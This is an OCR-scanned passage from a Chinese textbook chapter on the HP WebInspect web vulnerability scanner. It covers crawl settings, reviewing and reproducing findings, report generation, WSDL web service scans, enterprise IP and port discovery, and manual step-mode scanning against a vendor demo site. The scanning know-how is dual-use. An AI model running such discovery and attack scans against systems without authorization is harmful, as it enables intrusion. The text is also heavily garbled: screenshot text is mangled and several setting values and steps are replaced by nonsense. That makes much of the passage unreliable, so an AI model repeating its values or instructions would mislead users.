j Default scan settings are designed to fecus more on coverage than performance. Larger sites could take days te crawl with these sattinge. 


Audit Depth (Policy) 一 


Standard - I 


A standard scan intiudes an automated crawl of the server and performs checks for nomm vilnerabiiies et the web sever, web 
application server ; Mu cL M Echecs that ate HN o erat ite denial-of-service conditions, so it is saf fe 
Eo ran en production systems 

[Settings Default) | = Bak | Mex» ]| Cancel ]| 


图 10-47 NER — 
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2) 使 用 Crawl Coverage( 怜 行 覆盖 ) 滑 块 指定 爬行 设置 。 

此 滑 块 是 否 会 被 启用 ， 取 决 于 选择 的 扫描 模式 。 与 此 滑 块 相关 的 选项 卡 也 取决 于 用 户 的 
选择 。 如 果 启 用 ， 滑 块 将 允许 选择 四 种 聆 行 位 置 之 一 。 各 位 置 表示 设 定 值 的 特定 集合 ， 由 下 
面 的 选项 卡 表示 : 

a) 彻底 (Thorough) 
“彻底 ”使 用 以 下 设置 : 
e TREM: XA 
。 最 大 单 链 接点 击 数 : 20 
最 大 Web 表单 提交 : 7 
创建 脚本 事件 会 话 : 开 
每 页 最 大 脚本 事件 ， 2000 
每 个 会 话 允 许 的 动态 表单 数 : 无 限 
动态 表单 是 在 执行 脚本 时 被 修改 的 HTML 表单 。 如 果 需 要 很 长 时 间 来 审计 一 个 脚本 
密集 部 位 ， 将 每 个 会 话 动态 表单 的 数量 限制 到 零 次 或 一 次 来 缩短 审计 时 间 。 
b) Ski (Default) 
默认 使 用 以 下 设置 : 
命中 次 数 包括 参数 ， 真 
JUR XU: 关闭 
最 大 单 链接 点 击 数 : 5 
最 大 Web 表单 提交 : 3 
创建 脚本 事件 会 话 : 关 
每 页 最 大 脚本 事件 ，1000 
。 每 个 会 话 允 许 的 动态 表单 数 ， 无限 
c) 正常 QNormal) 
正常 使 用 以 下 设置 : 
e 命中 次 数 包括 参数 ， 真 
e TREM: 关闭 
。 最 大 单 链接 点 击 数 : 5 
e 最 大 Web 表单 提交 : 2 
。 创建 脚本 事件 会 话 : X 
。 每 页 最 大 脚本 事件 300 
。 每 个 会 话 允 许 的 动态 表单 数 ，1 
e 命中 次 数 包括 参数 : 假 
d) 快速 (Quick) 
快速 使 用 以 下 设置 : 
。 TRHMI: JF 
。 最 大 单 链接 点 击 数 : 3 
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e 最 大 Web 表单 提交 : 1 
。 创建 脚本 事件 会 话 : X 
。 每 页 最 大 脚本 事件 100 
。 每 个 会 话 允 许 的 动态 表单 数 : 0 
。 命中 次 数 包 括 参数 : 假 
如 果 单 击 Settings( 设 置 ( 打 开 高 级 设置 窗口 )， 并 更 改 与 四 个 滑 块 位 置 中 的 一 个 相 冲 突 的 
设置 ， 滑 块 创建 第 五 位 置 标记 Customized Coverage Settings( 自 定义 覆盖 设置 )。 
3) 从 Audit Depth (Policy)( 审 计 深度 (策略 )) 列 表 中 选择 策略 。 
这 个 列表 是 否 会 被 启用 ， 这 取决 于 步骤 1 中 选择 的 扫描 模式 。 
4) 单 击 Next( 下 一 步 )。 


任务 4: 提供 详细 的 扫描 配置 信息 ， 如 图 10-48 所 示 。 

如 果 单 击 Profile( 配 置 ) 文 件 (或 者 当 出 现 该 页 面 时 选择 Run Profiler Automatically( 自 动 运 
行 分 析 器 ))，WeblInspect 对 目标 网 站 进行 初步 审查 ， 以 确定 某 些 设置 是 否 要 修改 。 如 果 要 修 
改 ， 分 析 器 返回 一 个 建议 列表 ， 用 户 可 以 接受 或 拒绝 。 

启动 分 析 器 每 次 访问 这 个 页 面 ， 会 选择 自动 运行 分 析 器 。 要 手动 启动 分 析 器 ， 单 击 
Profile( 配 置 ) 文 件 ， 在 Settings( 设 置 ) 部 分 显示 结果 。 

1) 接受 或 拒绝 该 建议 。 要 拒绝 ， 清 除 相关 的 复 选 框 。 

2) 如 有 必要 ， 提 供 所 需 的 信息 。 


“EY Scan Wizard » 
Detailed Scan Configuration Step 4 of 5 
Review profiler recommendations and configure specific settings. 


| Profiler 


The profiler samples your web site and makes configuration recommendations to best scan your web site. These recommendations are added to the 
details section below. 


Run Profiler Automatically 


Settings 


Form Values 1of4 向 


r1 This section deals with the way information is gathered for a scan. | 
IL 


Auto fill web forms during crawl 


Webinspect submits values for input controls found on all forms. The values are extracted from a file you create using 
the Web form editor. Click Load to specify the file containing the values you want to use. 


(default) Load... ] | Edit... Create... 


Add Allowed Hosts 2of4 


Some URLs on the site might have host names that refer to sub-applications or related applications. You should review the list — ^ 
and choose the appropriate hosts to add to the allowed hosts setting. This will ensure that you scan the entire application. 


(Settings (Default). ~ 


图 10-48 详细 的 扫描 配置 
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3) 单 击 Next( 下 一 步 )。 
任务 5: 启动 或 计划 扫描 ， 如 图 10-49 所 示 。 
Sen Word rm Se We ttm 一 一 一 


Congratulations! Step 5 of 5 
You have successfully configured scan settings. Click the Save link to save these scan settings or the Scan button to start your scan. 


Save Settings 


Save scan settings for later use. 
- 


X | 


[esak | (Ean) (cance | 


图 10-49 保存 并 启动 扫描 
此 窗口 中 的 内 容 有 所 不 同 ,这 取决 于 用 户 的 选择 和 配置 (与 计划 扫描 类 似 ,不 详细 介绍 )。 


1) 上 传 到 AMP/ Weblnspect Enterprise 扫描 模板 

当 连 接 到 企业 服务 器 (AMP 或 WebInspect Enterprise) 时 ,用户 可 将 此 扫描 设置 发 送 到 企业 
服务 器 ， 这 将 创建 一 个 扫描 模板 。 但 必须 分 配给 一 个 角色 (在 AMP 或 WebInspect Enterprise)。 
单 击 上 传 超 文 本 的 链接 。 


2) 保存 设置 
用 户 可 保存 此 扫描 设置 ， 这 将 允许 以 后 再 次 使 用 此 扫描 设置 。 单 击 保存 超 文本 的 链接 。 
保存 扫描 设置 ， 单 击 Scan( 扫 描 ) 按 钮 开始 扫描 。 


任务 6: 网 站 测试 
1) WebInspect 的 工作 界面 如 图 10-50 所 示 。 
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图 10-50 — WebInspect 的 工作 界面 


重要 信息 说 明 : 

Site: 列 出 扫描 出 的 网 站 内 容 JSP、Servlet、JS 等 ， 根 据 网 站 树 来 排列 。 
Scan Info: 查看 扫描 的 总 体 信 息 。 

Dashboard: 以 柱状 图 来 显示 扫描 到 的 漏洞 。 

Traffic Monitor: 监控 交互 的 信息 。 

Session Info: 查看 一 个 具体 漏洞 的 详细 信息 。 

Vulnerability: 该 漏洞 的 详细 介绍 。 

Web Browser: 可 在 浏览 器 中 查看 发 现 的 漏洞 。 

HTTP Request: 查看 WebInspect 发 送 的 HITP Request 的 信息 。 
HTTP Response: 查看 待 测试 网 站 返回 的 HTTP Response。 

Details: 查看 HTTP Request X, HTTP Response k, Session 信息 。 
Steps: 查看 WebInspect 发 现 这 个 漏洞 的 详细 执行 步骤 。 

Host Info: 查看 待 测 网 站 主机 的 信息 。 


Vulnerability List， 以 列表 的 形式 列 出 已 扫描 到 的 漏洞 、WebInspect 的 日 志 信 息 、 针 对 


[ 具 来 重 现 


这 个 漏洞 的 最 佳 实践 等 。 在 这 里 可 以 更 改 漏洞 的 级 别 ， 利 用 Weblnspect 自 带 的 小 了 


该 漏洞 , 也 可 将 该 漏洞 发 送 到 HP Quality Center 或 者 IBM Rational Clear 中 (如 果 已 与 其 集成 )。 


2) 查看 漏洞 信息 
这 里 是 该 漏洞 的 所 有 信息 的 汇总 ， 在 漏洞 列表 中 右键 单 
中 选择 Review Vulnerability( 审 阅 漏洞 )， 打 开 的 界面 如 图 10-51 所 示 。 


要 查看 的 漏洞 ， 在 右键 快捷 菜 
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Steps to Reproduce 

URL 

http/zero webappsecurity com Bü] 

tpi/zero webaoptecurity.com 80/feedback html 
httpy/zero webappsecurity.comBü/send Feedback] names Jason&emails John DoedOvomewhere.com Form Target. 
Wtpil/zero webappiecurity.com BQ/vendFeedback! rares ch 619208499 72445 65s Id MAL Attack 


Post Pyometers Source Attack Parameter Response Match Status 


Ready Warning: Viewing vulnerabitts in the browser tab may have securty impacts 


图 10-51 查看 漏洞 信息 


Browser: 在 浏览 器 中 查看 该 漏洞 。 

Request; WebInspect 发 送 的 HTTP Request 信息 。 
Response: 待 测 网 站 返回 的 HTTP Response 信息 
Vulnerability: 查看 该 漏洞 的 详细 信息 介绍 。 
Attachments: 查看 该 漏洞 所 添加 的 附件 。 
界面 下 方 显示 了 重 现 步骤 。 


3) 利用 Weblnspect 自 带 小 工具 重 现 漏洞 

在 漏洞 列表 中 右键 单 击 要 重 现 的 漏洞 ， 在 右键 快捷 菜单 中 选择 Tools( 工 具 )，WebInspect 
会 高 亮 显示 可 用 的 小 工具 ， 这 里 以 HTTP Editor 为 例 进行 介绍 ， 如 图 10-52 所 示 。 

HTTP Editor 工作 界面 的 上 方 是 WebInspect 发 送 的 HTTP Request 的 详细 信息 ， 单 击 
Send( 发 送 ), 待 测 网 站 返回 的 HTTP Response 信息 会 显示 在 工作 界面 的 下 方 , 选择 Browser( 浏 
览 ) 标 签 可 在 浏览 器 中 查看 该 漏洞 。 


4) 更 改 缺陷 级 别 


在 漏洞 列表 中 右键 单 击 要 更 改 缺陷 级 别 的 漏洞 ， 在 右键 快捷 菜单 中 选择 Change 
Severity( 更 改 严重 性 )。 
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Q HTTP Editor — p 

D EZ H| Send As Is. © Show History 

Fie Edit View Help 

Location: http://zero.webappsecurity.com:80/sendFeedbackhtml 
[Request viewer 


Details 


: application/x-www-form-urlencoded 
ngth: 180 


JA No occurrences found in request 


图 10-52 使 用 HTTP Editor 重 现 漏洞 


5) 在 下 次 扫描 中 忽略 该 漏洞 

用 户 可 能 发 现 有 些 漏洞 是 误 报 的 ， 希 望 在 下 次 扫描 中 忽略 这 些 漏洞 ， 那 么 可 以 在 漏洞 列 
表 中 右键 单 击 要 忽略 的 漏洞 , 在 右键 快捷 菜单 中 选择 Mark As( 标 记 为 ), 再 选择 Ignored( 忽 略 ) 
或 False Positive( 误 报 )。 


6) 导出 缺陷 信息 

在 漏洞 列表 中 右键 单 击 要 导出 缺陷 信息 的 漏洞 ， 在 右键 快捷 菜单 中 选择 Export( 导 出 )， 
再 选择 Selected item(s) to CSV( 选 中 条 目 导出 为 CSV) 或 All items to CSV( 全 部 条 目 导 出 为 
CSV)， 导 出 格式 为 .csv。 


7) 将 漏洞 发 送 到 HP Quality Center 

在 漏洞 列表 中 右键 单 击 要 发 送 的 漏洞 ， 如 果 HP Weblnspect 和 HP Quality Center 已 经 和 
WebInspect 进行 集成 ,在 右键 快捷 菜单 中 选择 Send( 发 送 )， 再 选择 HP Quality Center, 然后 填 
写 漏洞 信息 , 该 漏洞 会 作为 一 个 缺陷 (bug), 发 送 到 HP Ouality Center 并 根据 HP Quality Center 
中 定义 的 流程 来 处 理 。 

任务 7: 生成 报告 可 以 利用 WeblInspect 自 带 的 Report Designer 来 设计 报告 的 格式 ， 具 体 
操作 为 选择 Reports( 报 告 )， 再 选择 Report Designer( 报 告 设计 器 )， 打 开 Report Designer. 之 后 
选择 File( 文 件 )， 再 选择 New( 新 建 ) 打 开 报 告 定义 窗口 ， 如 图 10-53 所 示 。 
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Description: 


CE] 


View Nome 


Aggregate - Tech and Content Trend 
Aggregate - Threat Class Count 
Aggregate - Top Vulns Over Year 
Aggregate - Vulnerability Count by Date 
gregote - Vuinerability Count by Ps 


图 10-53 Create Report Definition 窗口 


Name: 给 报告 设置 一 个 名 称 。 

Description: 报告 的 具体 描述 。 

Context: 选择 整个 扫描 的 报告 或 者 单个 漏洞 的 报告 。 

Views: 选择 需要 展示 的 视图 。 

View Parameters: 该 视图 对 应 的 参数 。 

View Fields: 该 视图 对 应 的 域 。 

View Description: 视图 的 具体 介绍 。 

单 击 OK( 确 定 ) 按 钮 ， 打 开具 体 的 格式 设计 界面 ， 如 图 10-54 所 示 。 


TE 
Teus 


10-54 ”报告 格式 设计 界面 
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设计 好 之 后 保存 。 
单 击 Reports( 报 告 ) 的 下 拉 列 表 选 择 Generate Reports( 生 成 报告 ) 或 单 击 工作 界面 左 侧 的 
Generate a Report( 生 成 报告 )， 打 开 的 界面 如 图 10-55 所 示 。 


V/wwwba- http://www.baidu... Open - 4625 MB 
: Last Month (2 items) 
F Site: http://zero.we... http://zero.webapp... Open - 71.25 MB 
| web Site Scan http://zero.webapp... Open - 53.25 MB 
© Scan Date: Older (3 items) 


Webinspect Agent... http://riches;8080/... Complete 66.25 MB 


Webinspect Agent... http;//riches:8080/... Complete 49.25 MB 
Sample Scan http://zero.webapp... Complete. 85.25 MB 


Advanced | 门 Open Reports in Separate Tabs 


图 10-55 选择 生成 报告 的 扫描 


选中 要 生成 报告 的 扫描 名 称 ， 单 击 Next( 下 一 步 )， 如 图 10-56 所 示 。 


Custom Reports 
E site 

Standard Reports. 
Aggregate 

E] Alert View 

E Attack Status 

E Compliance 

[E Crawled URLS 

E] Developer Reference 
E Duplicates 

Executive Summary 
E False Positive 

E| QA Summary 

El Scan Difference 

El Scan Log 

E Trend 

Vulnerability 

E Vulnerability (Legacy) 


图 10-56 选择 生成 报告 的 内 容 
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选择 需要 展示 的 信息 内 容 , 常用 的 有 3 个 : Compliance, Executive Summary, Vulnerability。 


注意 图 10-56 不 要 勾 选 太 多 选项 ， 勾 选 太 多 会 导致 生成 报告 页 数 太 多 ，44 


很 慢 。 


成 速度 也 会 


单 击 机 WebInspect 会 生成 PDF 格式 的 报告 ， 如 图 10-57 所 示 。 


Multiple Reports 


图 10-57 生成 PDF 格式 的 报告 


单 击 保存 按钮 后 , 可 将 生成 的 WebInspect 报告 保存 到 本 地 。 报 告 中 有 详细 的 漏洞 分 布 图 ， 
如 图 10-58 所 示 ， 以 及 漏洞 代码 ， 如 图 10-59 所 示 ， 显 示 为 红色 的 代码 是 漏洞 代码 。 


Scan Name. # of Servers Policy Date Duration vulis 
Site: tt//zero. webaopsecurity.com/. Standard 08/03/14 1hr:imn € 


Server Content 


Server Cookies Forms Scripts External Broken Server Types 
links — Links 


http://zero.webappsecurity.com:80 ne me Axe AMP pe 
Sevi 


Total 


Locations With Vulnerabilities 


E Nan Los] veio IUE HN  Ditical 
Vulnerability Count by Server 


Server High Medium Low Info BP 


http://zero.webappsecurity.com:80 


Total 


图 10-58 ”漏洞 的 详细 分 布 
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图 10-59 标 红 代码 为 漏洞 代码 


10.3.3 Web 服务 扫描 
当 执行 Web 服务 评估 时 ，WebInspect PILET WSDL 网 站 ， 并 提交 每 次 操作 中 发 现 的 
每 个 参数 的 任意 枚 举 值 。 这 些 值 摘录 自用 户 必 须 创 建 使 用 的 Web 服务 设计 器 文件 。 然 后 在 试 
图 检测 漏洞 时 ， 通 过 攻击 每 个 参数 去 审计 网 站 ， 如 SQL 注入 。 
Web 服务 扫描 界面 如 图 10-60 所 示 。 
E Wb Serven Sean Mad. i ns ipse 


Web Service Scan 
Find voleerstikties from 2 Web Service Dinten File 


Scan Name: Fervee: htta://agacy.webappsacurry.com/Customeraccounts/WebServce aem wed 


Step 1 of4 


© Configure a Web Service Scan 
| 
P x 


[ere 


[I 
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任务 1: 选择 一 个 WSDL 或 设计 文件 
1) 在 扫描 名 称 文本 框 中 输入 Scan Name( 扫 描 名 称 )。 
2) 选择 下 列 选项 之 一 : 


配置 Web 服务 扫描 (Configure a Web Service Scan): 输入 或 选择 一 个 WSDL 文件 的 
完整 路 径 和 名 称 ， 或 者 单 击 国 打 开 一 个 标准 的 文件 选择 对 话 框 ， 选 择 一 个 WSDL 
文件 。 导入 WSDL 文件 ,随后 运行 Web 服务 测试 设计 配置 包含 在 服务 中 的 每 个 操作 
文件 的 值 。 

扫描 现 有 设计 文件 (Scan with Existing Design File: 单 击 世 打开 一 个 标准 的 文件 选 
择 对 话 框 ， 然 后 选择 使 用 的 Web 服务 测试 设计 文件 ， 此 文件 由 先前 的 Web 服务 测试 
设计 (WSD) 创 建 。 此 文件 包含 服务 中 每 个 操作 的 值 。 


3) 单 击 Next( 下 一 步 )。 
注意 : WSDL 文件 为 接口 文件 ， 测 试 人 员 可 向 开发 人 员 索 要 这 个 文件 。 


任务 2: 提供 身份 验证 和 连接 信息 
1) 如 果 需 要 通过 代理 服务 器 访问 目标 网 站 , 选择 网 络 代理 服务 器 , 然后 从 代理 配置 文件 
列表 中 选择 选项 : 


自动 检测 (Autodetecb: 使 用 Web 代理 自动 发 现 协议 (WPAD) 来 定位 代理 自动 配置 文 
件 ， 并 使 用 它 来 配置 浏览 器 的 Web 代理 服务 器 设置 。 

使 用 Internet Explorer(Use Internet Explorer): 从 IE 导入 代理 服务 器 信息 。 

使 用 PAC 文件 (Use PAC File); 从 代理 自动 配置 PAC) 文 件 加 载 代理 设置 。 如 果 选 择 
此 选项 ， 单 击 Edit( 编 辑 )， 然 后 进入 PAC 的 位 置 (URL)。 

使 用 显 式 代 理 设置 (Use Explicit Proxy Settings): 指定 代理 服务 器 设置 。 如 果 选 择 此 
选项 ， 单 击 Edit( 编 辑 )， 然 后 进入 代理 信息 。 

使 用 Mozilla Firefox 浏览 器 (Use Mozilla Firefox): 从 Firefox 导入 代理 服务 器 信息 。 


注意 ， 选 择 使 用 浏览 器 的 代理 设置 并 不 能 保证 通过 代理 服务 器 访问 网 络 。 如 果 Firefox 
浏览 器 的 连接 设置 配置 为 “无 代理 ”或 者 不 选中 Intemet Explorer 设置 “使 用 代理 服务 器 为 
LAN”， 那 么 代理 服务 器 不 会 被 使 用 。 

2) 选择 网 络 身份 验证 ， 如果 需要 服务 器 身份 验证 ， 则 选择 一 种 身份 验证 方法 ,输入 网 络 


凭据 


提供 身份 验证 和 连接 信息 界面 ， 如 图 10-61 所 示 。 


3) 单 击 Next( 下 一 步 )。 
任务 3: 详细 扫描 配置 


1) 要 创建 一 个 测试 设计 文件 ， 一 个 消息 将 提示 用 户 启动 Web 服务 测试 设计 。 直 到 使 用 
设计 器 创建 一 个 Web 服务 设计 (WSD) 文 件 ， 扫 描 向 导 才 会 前 进 ， 如 图 10-62 所 示 。 
2) 如 果 已 经 选择 了 设计 测试 文件 , 用 户 可 单 击 Design( 设 计 ), 打开 Web 服务 测试 设计 入 


编辑 WSD 文件 ， 该 文件 包含 应 在 扫描 过 程 中 提交 的 WSDL 文件 的 值 。 
3) (可 选 ) 可 选择 以 下 选项 : 
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。 通过 Web 代理 服务 器 并 启动 Direct Traffic。 注 意 ， 正 在 进行 计划 扫描 时 ， 此 选项 不 
可 用 。 

。 启用 流量 监控 器 。 

4) 单 击 Next( 下 一 步 )。 
EAW sanes sen weard Sr Eee cl 


Authentication and Connectivity Step2of4 4 | 
Provide the necessary credentials and environment information to gain access to the target web site. | 
| Network Proxy | 
Proxy Profile: [Use Internet Explorer. x) (edi...) 


四 Network Authentication 
Method: z 


UserName: | Password: 


[Settings (Defaut) + [ ex» | 
图 10-61 身份 验证 和 连接 信息 界面 


(EN Web Service Scan: E 


Detailed Scan Configuration Step 3 of 4 


Design Web Service operations and configure specific settings. 


Web Service Test Designer 


Use the Web Service Test Designer to specfy data that will be sent to the web service application, configure security, and verify that the system. 
performs as designed. 


Name: Zero Test Design Design. 


Settings. E — 


, Traffic Analysis 1of2 | 


Enable options to analyze HTTP traffic. ~ 


E Launch ard Direct Traffic Through Web Proxy 


Web Proxy is a stand-alone, self-contained proxy server that you can configure and run on your desktop. With it, you 
can monitor traffic from a scanner, a browser, or any other tool that submits HTTP requests and receives responses 
from a server. It is a tool for debugging znd penetration scanning; you can see every request and server response. 
while browsing a site. 


El Enable Traffic Monitor 
|  Webinspect displays in the navigation pane only the hierarchical structure of the Web Site or Web Service, plus those 


sessions in which a vulnerability was discovered. The Traffic Monitor allows you to display and review every HTTP. 
request sent by WebInspect and the associated HTTP response received from the server. 


图 10-62 扫描 详细 配置 
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任务 4: 启动 或 计划 扫描 ( 同 基础 扫描 )。 
10.34 ”企业 扫描 


企业 扫描 允许 从 企业 网 络 的 角度 总 览 用 户 网 络 。WebInspect 自动 发 现 所 有 可 用 端口 的 下 
地 址 范围 。 然 后 ， 可 选择 使 用 哪些 服务 器 来 评估 所 有 被 发 现 的 漏洞 。 
当 启 动 一 个 企业 扫描 时 ， 出 现 企业 扫描 窗口 ， 如 图 10-63 所 示 。Recurrence Pattem( 循 环 
模式 ) 栏 选择 开始 扫描 的 时 间 ， 可 以 选择 立即 开始 或 指定 在 每 天 的 某 个 时 间 扫 描 。 


LY Enterprise Scan Wizard 979 0o IE 


Enterprise Scan Step 1 of 2 
An Enterprise Scan provides a comprehensive overview of your Web presence from an enterprise network perspective. 


Recurrence Pattern 


® Immediately 
The scan will run immediately after finishing this wizard. 


Fd 10-63 ”在 企业 扫描 窗口 中 ， 可 指定 扫描 时 间 


1) 进行 扫描 指定 。 选 项 包括 : 

立即 (mmediately)。 

。 运行 一 次 (Run Once): 设置 扫描 开始 时 的 日 期 和 时 间 。 可 以 单 击 下 拉 箭 头 以 显示 日 
历 ， 选 择 日 期 。 

。 循环 计划 (Recurrence Schedule): 使 用 滑 块 来 选择 一 个 频率 (每 日 、 每 周 或 每 月 )。 然 
后 指定 扫描 应 开始 的 时 间 ( 每 周 或 每 月 ) 并 提供 其 他 计划 信息 。 

单 击 Next( 下 一 步 ) 继 续 进行 设置 ， 页 面具 体内 容 介绍 如 图 10-64 所 示 。 

企业 扫描 名 称 (Enterprise Scan Name): 为 本 次 扫描 设置 一 个 名 称 。 

Web 发 现 (Web Discovery): 单 击 Discover( 发 现 ) 按 钮 ， 提 供 一 个 人 P 地 址 或 一 个 人 地址 

的 范围 ，WebInspect 会 自动 发 现 目标 主机 ， 被 发 现 的 主机 会 列 在 下 方 的 主机 列表 内 。 
主机 列表 (Hosts to Scan): 可 手动 添加 一 台 待 测 主机 ， 也 可 以 从 外 部 导入 。 
2) 在 Enterprise Scan Name( 企 业 扫描 名 称 ) 杠 中， 输入 本 次 企业 扫描 的 唯一 名 称 。 
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从 企业 网 络 的 角度 来 看 ， 企 业 扫 描 允 许 总 览 网 络 存在 。 用 户 可 以 : 


。 通过 对 指定 范围 内 的 他 地址 和 端口 进行 扫描 发 现 所 有 可 用 的 服务 器 。 
。 输入 单个 URL 或 耳 地 址 。 


。 导入 服务 器 列表 (使 用 先前 创建 的 列表 )。 
Web 查看 


按照 下 面 的 步骤 来 查看 Web 服务 器 。 
1) 单 击 Discover( 发 现 )。 


Search For Web Servers (Web 服务 器 搜索 ) 窗 口 会 出 现 ， 如 图 10-65 所 示 。 


Bo es 
Enterprise Scan Step 2 of 2 


Enterpnse Scan Name: New Ertarpree Scar 


Web Discovery 


Weblrapect can search your netwerk and autometicaly detect Web sites to be scanned. Clik the Discover button to use this 


Discover) | 
Hosts to can 


Site Scan Mode Policy 


Casa... | 
agr. ) 
< Back. Cancel 


图 10-64 输入 企业 扫描 信息 


Search For Web Servers 

Search Addhesses 

IPVA/PVE Addresses [or ranges] Pots (or ranges) 

1 980443 

Example: 192 168 01-192 1680:12172 16.10.20; 2001:0c Example: 80100443 
Total IP addresses speciied 0 Total ports specified: 2 


Discovered End Points 
Selection IPAddress Port 


Identification 


10-65 Search For Web Servers 窗口 
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2) 在 IPV4/IPV6Addresses (or ranges)(IPVA/IPV6 地 址 (或 范围 )) 框 中 , 键入 一 个 或 多 个 他 
地 址 或 他 地址 范围 。 

。 使 用 分 号 分 隔 多 个 地 址 。 

例如 : 172.16.10.3; 172.16.10.44; 188.23.102.5。 

。 使 用 破 折 号 或 连 字 符 分 隔 起 始 和 结束 下 地 址 范围 。 

例如 : 10.2.1.70-10.2.1.90。 

注意 ，IPV6 地 址 必须 括 在 括号 中 。 

3) 在 Ports (orranges)( 端 口 (或 范围 ) 杠 中， 键入 要 扫描 的 端口 。 

。 使 用 分 号 来 分 隔 多 个 端口 。 

例如 : 80; 8080; 443. 

。 使 用 破 折 号 或 连 字 符 在 一 定 范围 内 分 隔 起 始 和 结束 端口 。 

例如 : 80-8080. 

4) 单 击 Settings( 设 置 ) 来 修改 套 接 字 的 数目 和 超时 参数 (可 选 )， 用 于 发 现 可 用 服务 器 的 

5) 单 击 Start( 开 始 )， 如 图 10-66 所 示 。 结 果 在 发 现 终点 (Discovered End Points) 区 域 中 
显示 。 

* "i; IP Address(IP 地 址 ) 列 中 的 条 目 ， 以 查看 该 网 站 。 

o 单 击 Identification( 身 份 验证 ) 列 中 的 条 目 ， 打 开会 话 属性 窗口 ， 在 这 里 用 户 可 以 查看 

原始 请 求 和 响应 。 
6) 要 从 列表 中 删除 服务 器 ， 请 清除 相应 复 选 框 中 的 Selection( 选 择 ) 列 。 
7) 单 击 OK( 确 定 )。 


Search For Web Servers. 


Search Addresses 
IPVA/IPV6 Addresses (or ranges) Ports (or ranges) 


192. 168.0. 1-192. 168.0. 12; 172. 16. 10.20;2001:0db8::1428:57ab 80;443 
Example: 192.168.0.1-192.168.0.12;172.16.10.20; 2001:0db8::1428:57ab Example: 80-100;443 
Total IP addresses specified: 14 Total ports specified: 2 


Discovered End Points 
Selection IP Address. Port 


图 10-66 开始 发 现 过 程 
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主机 扫描 

按照 下 面 的 步骤 手动 输入 要 扫描 的 URL 2X IP 地 址 列表 ， 如 图 10-67 所 示 。 
1) 单 击 Add( 添 加 )。 

2) 对 Web 网 络 添加 描述 信息 。 

3) 对 其 他 服务 器 进行 重复 操作 。 


导入 列表 
使 用 企业 扫描 功能 或 网 络 发 现 工具 来 检测 服务 器 ， 并 以 一 个 文本 文件 导出 ， 用 户 可 通过 
单 击 Import( 导 入 ) 加 载 这 些 结果 ， 然 后 选择 保存 文件 。 


编辑 “要 扫描 的 主机 ”列表 

建立 使 用 一 种 或 更 多 上 面 方法 的 服务 器 列表 后 ， 可 使 用 以 下 步骤 修改 列表 ; 
要 修改 特定 的 扫描 设置 ; 

1) 选择 服务 器 。 

2) 单 击 Edit( 编 辑 )。 

3) 更 改 设置 。 

4) 单 击 Finish( 完 成 )。 


= Uo ERN 


= 


Ic Enterprise Scan Wizard 


| Enterprise Scan Step 2 of 2 
Execute multiple scans. | 


Enterprise Scan Name: New Enterprise Scan 


Web Discovery 
Weblrapect can search your network and automatically detect Web sites to be scanned. Click the Discover button to use this 
sature. 


| Discover... | 
Hosts to Scan 
Site Scan Mode Policy 
http://www.baidu.com/ Crawi& Audit Standard [ Edit... ] 
|. Delete 
|Amport... | 
[ Export... | 


| <Back | Schedule | | Cancel | 
J 


图 10-67 手动 输入 要 扫描 的 URL 


要 从 列表 中 删除 服务 器 : 
1) 选择 一 个 服务 器 。 
2) 单 击 Delete( 删 除 )。 
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导出 列表 

要 保存 “要 扫描 的 主机 ”的 列表 : 

1) 单 击 Export( 导 出 )。 

2) 使 用 一 个 标准 的 文件 选择 窗口 ， 指 定 文件 名 和 位 置 。 


开始 扫描 

要 开始 企业 扫描 ， 单 击 Schedule( 计 划 )。 每 个 服务 器 的 扫描 结果 完成 后 ， 自 动 保存 在 用 
户 默 认 扫描 的 文件 夹 中 。 服 务 器 的 名 称 以 及 日 期 和 时 间 戳 都 被 包含 在 文件 名 中 。WebInspect 
会 提示 已 经 安排 在 某 个 时 间 进 行 扫描 ， 如 图 10-68 所 示 。 


Q New Enterprise Scan Scheduled 


The Enterprise Scan "New Enterprise Scan" has been 
successfully scheduled. 


You can view the status or re-configure the Enterprise 
Scan by accessing the scan scheduler from either the 
home page (via the "Manage Scheduled Scans" link) 
or from the file menu (via the "Schedule" menu item) 


| 
[E] Don't notify me about this in the future 


Kd 10-68 企业 扫描 设置 完成 


注意 ，WebInspect 许可 证 允许 用 户 扫 描 特定 的 中 地址 或 一 个 地 址 范围 。 如果 服务 器 有 一 
个 中 地 址 不 被 许可 证 允许 ， 该 服务 器 将 不 包含 在 扫描 中 。 


10.35 ”手动 扫描 


手动 扫描 (也 称 为 步 模式 ) 是 一 个 网 站 的 扫描 选项 ， 可 让 用 户 手 动 单 击 应 用 程序 可 访问 的 
任何 部 分 。 它 不 会 聆 行 整个 网 站 ， 但 会 记录 用 户 遇 到 的 手动 单 击 网 站 的 这 些 资源 的 信息 。 此 
功能 最 常用 的 是 通过 一 个 登录 页 面 进入 网 站 或 定义 要 调查 该 应 用 程序 的 离散 子 集 , 如 图 10-69 
所 示 。 

一 且 完 成 浏览 网 站 ， 用 户 可 审计 结果 来 评估 访问 和 记录 方面 的 安全 漏洞 。 

按照 下 面 的 步骤 来 记录 使 用 步 模式 浏览 网 站 ; 

1) 在 WebInspect 菜单 栏 上 ， 单 击 File( 文 件 )， 再 依次 单 击 New( 新 建 ) 和 Basic Scan (基础 
扫描 )。 

或 者 ,也 可 以 单 击 WebInspect 开始 页 选项 卡 , 然后 选择 Start a Basic Scan (启动 基础 扫描 )。 

2) 按照 基础 扫描 描述 ， 选 择 Manual( 手 动 ) 作 为 扫描 方法 ， 配 置 一 个 网 站 扫描 的 说 明 。 

3) 配置 所 有 扫描 参数 后 ， 单 击 Scan( 扫 描 )。 

4) 当 浏览 器 打开 时 ， 用 它 来 浏览 目标 网 站 ， 访 问 想 记录 的 区 域 。 

5) 完成 后 ， 返 回 WebInspect 窗口 ， 然 后 单 击 Finish( 完 成 )。 

6) 当 导 航 窗 格 返 回 到 网 站 视图 时 ， 可 单 击 态 &dt( 在 工具 栏 上 ) 来 审计 网 站 。 

如 果 使 用 步 模式 来 浏览 一 个 网 站 , 需要 基本 身份 验证 或 NTLM 认证 ，WebInspect 将 记 住 
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Pm, ARAA SABE RE FEET. SETA ERI AA B GA UEZI AE; 
WeblInspect 将 步 模式 期 间 遇 到 的 每 个 服务 器 上 的 NTLM 和 基本 身份 验证 进行 区 别 。 


10.3.6 ”审阅 和 重新 测试 漏洞 


WebInspect 提供 几 种 方法 来 检查 或 重新 测试 发 现 的 漏洞 。 
。 重新 测试 个 别 的 漏洞 

。 重新 测试 所 有 发 现 的 漏洞 

。 重新 扫描 整个 网 站 

。 比较 两 次 扫描 


Home 


Step Mode 


Browse 


日 [^ http: //zero.webappsecurity.com:8Ü 
http: //zero.webappsecurity.com:BÜ/acctsferconfirm. asp (Pal 
